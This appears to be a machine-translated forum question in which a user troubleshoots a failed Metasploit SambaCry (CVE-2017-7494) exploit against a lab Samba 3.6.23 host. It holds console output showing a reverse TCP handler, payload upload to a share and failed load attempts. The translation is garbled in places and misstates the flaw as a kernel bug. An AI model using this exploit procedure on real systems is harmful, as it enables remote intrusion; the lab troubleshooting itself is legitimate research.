0
私は、metasploitフレームワークを使用していくつかの研究作業のためにLinuxカーネルの脆弱性samba cry(CVE-2017-7494)を利用しようとしています。しかし、私はmetasploitを使ってsambaの妥当性を利用することができません
[*] Started reverse TCP handler on 192.168.78.136:4444
[*] 192.168.78.139:445 - Using location \\192.168.78.139\myshare\ for the
path#
[*] 192.168.78.139:445 - Retrieving the remote path of the share 'myshare'
[*] 192.168.78.139:445 - Share 'myshare' has server-side path '/shared
[*] 192.168.78.139:445 - Uploaded payload to
\\192.168.78.139\myshare\BsdRHcSh.so
[*] 192.168.78.139:445 - Loading the payload from server-side path
/shared/BsdRHcSh.so using \\PIPE\/shared/BsdRHcSh.so...
[-] 192.168.78.139:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.78.139:445 - Loading the payload from server-side path
/shared/BsdRHcSh.so using /shared/BsdRHcSh.so...
[-] 192.168.78.139:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Exploit completed, but no session was created.
を実行します>(is_known_pipename)を悪用し、次のエラーMSFを取得し、私のターゲットホストはvalnurableないか、または任意の他の問題であるので、それ?私のターゲットホストには、Sambaバージョン3.6.23があります。私が知る限り、それは価値があります。
おかげ